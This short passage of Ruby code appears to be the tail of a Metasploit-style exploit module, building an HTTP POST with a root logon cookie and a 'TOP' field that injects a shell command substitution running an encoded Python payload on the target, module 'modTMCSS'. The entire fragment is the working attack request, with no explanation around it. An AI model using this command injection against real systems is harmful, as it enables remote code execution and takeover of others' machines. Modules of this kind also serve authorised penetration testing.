'cookie' => "CurrentLocale=en-US; LogonUser=root; JSESSIONID=#{jsessionid}; #{cookies}",
'vars_post' => {
'module' => 'modTMCSS',
'serverid' => '1',
'TOP' => "$(python -c \"#{payload.encoded}\")"
}
})
end
end